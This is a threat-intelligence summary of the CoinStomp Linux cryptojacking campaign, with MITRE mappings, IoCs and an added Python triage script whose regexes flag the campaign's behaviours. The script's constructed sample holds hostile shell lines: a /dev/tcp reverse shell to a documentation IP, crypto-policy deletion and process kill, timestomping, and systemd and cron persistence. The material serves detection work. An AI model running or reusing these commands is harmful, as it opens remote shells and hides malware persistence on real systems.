Researchers from Cado Security uncovered CoinStomp, a Linux-based malware family targeting Asian Cloud Service Providers to mine cryptocurrency using a shell-script campaign. It employs timestomping, removal of cryptographic policies, and a /dev/tcp reverse shell for C2, and references a prior cryptojacking operation named Xanthe. #CoinStomp #Xanthe
Keypoints
- CoinStomp is a campaign composed of shell scripts targeting Asian Cloud Service Providers to mine cryptocurrency.
- Timestomping is used as an anti-forensics measure to disguise activity and obstruct remediation.
- The malware removes system cryptographic policies and even kills the crypto policy process to weaken defenses.
- C2 communication is conducted via a /dev/tcp reverse shell to a remote server (106.53.115.114:443) using HTTP traffic.
- There are references to a prior cryptojacking campaign named Xanthe, including a URL in Cron-related activity intended to foil attribution.
- Additional payloads (Sshno, Stater, Adupd, Dhcpclient) are persisted as root-privileged systemd services; Dhcpclient is a modified XMRig miner and uses config.jason/xmrig.jason files.
MITRE Techniques
- [T1070.006] Timestomp – Manipulates file timestamps to hinder forensics. “Timestomping is the process of manipulating timestamps for files dropped or utilised during a malware attack.”
- [T1562.001] Impair Defenses – Removes cryptographic policy files and kills the crypto process to undermine security controls. “Removal of the configuration files that define system-wide cryptographic policies and even kill the crypto process itself.”
- [T1059.004] Unix Shell – Uses /dev/tcp to establish a reverse shell/C2 channel. “Line 4 establishes a reverse shell connection via the /dev/tcp device file to a remote server at 106[.]53.115.114 over port 443.”
- [T1071.001] Web Protocols – C2 traffic over HTTP on port 443, enabling data exchange with the C2 server. “the traffic itself is unencrypted – as it’s being transferred using HTTP.”
- [T1053.003] Cron – Scheduling tasks via Cron for persistence and potential callback actions. “Creation of scheduled tasks via the Cron scheduler is a common malware persistence technique on Linux systems.”
- [T1543.003] Create/Modify Systemd Service – Payloads persisted as systemd services with root privileges. “persisted as system-wide systemd services, resulting in them being executed with root privileges and kept alive.”
- [T1027] Obfuscated/Encrypted Files and Information – Obfuscated binaries used as payloads. “Sshno is a heavily-obfuscated 32 bit ELF binary.”
- [T1496] Resource Hijacking – Mining cryptocurrency using the infected host’s resources. “mining capabilities of this malware” and the campaign’s objective to mine cryptocurrency.
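Several of the techniques above (the `/dev/tcp` channel, crypto-policy removal, `touch`-based timestomping, systemd and cron persistence) leave recognisable text in the shell scripts that carry them, so a defender can triage recovered scripts statically before running anything. Below is an added example of such a triage pass; it is my own code, not Cado Security's or the campaign's. The regexes are my heuristics, the unit names come from this page's IoC list, the `/etc/crypto-policies` path is an assumption based on RHEL-family systems, and both sample scripts are constructed (the IP is a documentation address).

```python
"""Static triage of shell scripts for the CoinStomp behaviours summarised above.

Added example, not Cado Security's code. The regexes are my own heuristics; the
systemd unit names come from this page's IoC list; the sample scripts are
constructed and use an RFC 5737 documentation address, not the real C2.
"""
import re
from typing import Dict, List, Tuple

# Payload names the summary says are persisted as root-privileged systemd services.
KNOWN_UNITS = "|".join(("sshno", "stater", "adupd", "dhcpclient"))

# One rule per MITRE technique named above. Every pattern is line-bounded ([^\n]*)
# so a hit can be reported as the offending script line.
RULES: Dict[str, "re.Pattern[str]"] = {
    "T1059.004 /dev/tcp socket": re.compile(
        r"/dev/tcp/(?P<host>[\w.\-\[\]]+)/(?P<port>\d{1,5})"),   # also matches defanged 1[.]2.3.4
    "T1562.001 crypto-policy tampering": re.compile(
        r"\b(?:rm|unlink|shred)\b[^\n]*crypto-polic"            # deleting policy configs
        r"|\b(?:kill|pkill|killall)\b[^\n]*crypto",              # killing the crypto policy process
        re.IGNORECASE),
    "T1070.006 timestomp": re.compile(
        r"\btouch\b[^\n]*\s(?:-[acfhm]*[drt]\b|--(?:date|reference)\b)"),
    "T1543.003 systemd persistence": re.compile(
        rf"systemctl\s+(?:enable|start)\s+(?:--now\s+)?(?:{KNOWN_UNITS})\b"
        rf"|/etc/systemd/system/(?:{KNOWN_UNITS})\.service"),
    "T1053.003 cron": re.compile(
        r"\bcrontab\b|/etc/cron(?:tab|\.d|\.hourly|\.daily)\b"),
}


def triage_script(text: str) -> Dict[str, List[str]]:
    """Return {rule name: [matched snippets]} for every rule that fires on the script."""
    hits: Dict[str, List[str]] = {}
    for name, rx in RULES.items():
        snippets = [m.group(0).strip() for m in rx.finditer(text)]
        if snippets:
            hits[name] = snippets
    return hits


def c2_endpoints(text: str) -> List[Tuple[str, int]]:
    """Pull (host, port) pairs out of /dev/tcp redirections for blocklisting."""
    rx = RULES["T1059.004 /dev/tcp socket"]
    return [(m.group("host"), int(m.group("port"))) for m in rx.finditer(text)]


# Constructed sample modelled on the behaviours in the summary (not the real script).
SUSPICIOUS = """#!/bin/bash
exec 3<>/dev/tcp/198.51.100.7/443
rm -f /etc/crypto-policies/back-ends/*.config
pkill -f crypto
touch -d "2017-02-02 02:02:02" /usr/bin/dhcpclient
cp dhcpclient.service /etc/systemd/system/dhcpclient.service
systemctl enable --now dhcpclient
(crontab -l; echo "*/5 * * * * /tmp/zz.sh") | crontab -
"""

# Constructed benign deploy script: touches a marker file and restarts a service.
BENIGN = """#!/bin/bash
set -e
tar -xzf release.tgz -C /opt/app
touch /opt/app/.deployed
systemctl restart app
"""


if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(f"== {label}: {len(triage_script(script))} rule(s) fired")
        for rule, snippets in triage_script(script).items():
            print(f"  {rule}: {snippets}")
    print("C2 endpoints:", c2_endpoints(SUSPICIOUS))
```

The rules are deliberately narrow: the systemd rule only fires on the unit names from this campaign, so it will miss a renamed payload, while the `/dev/tcp` and `touch -d/-r/-t` rules are generic and will also flag legitimate admin scripts. Scoring by how many distinct techniques fire in one file, rather than alerting on any single rule, separates a deploy script from a dropper like the one modelled here.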
Indicators of Compromise
- [Filename] d.py – cb9f0dca725fa0eae8a39c7d07e62441d6ae50b776df8a9ab1cb7f86a22c75ca
- [Filename] zz.sh – 17dd410fd7d42d34bd01b96c135f7890f1b3b15354a5d67f63acb70044752397
- [Filename] adupd – 7a065c7f0d17436809ce3a9bb6bebb74d4207f8555b8291c7ee3e3deac492a2b
- [Filename] dhcpclient – c1a3f32689461fb9570d4e212bba18391f6bb413bc77cb16def92d0226320e7d
- [Filename] sshno – 57c2fef3dd66a3756e85df53ad825d7bf6ff1ee38504323b756b4fc5d47023c3
- [Filename] stater – 3420588e7231167052775e68bab84384f449e08f1dd9ec9ba29f8437b5f86334
- [IP Address] 205.185.113.151
- [IP Address] 106.53.115.114
Read more: https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/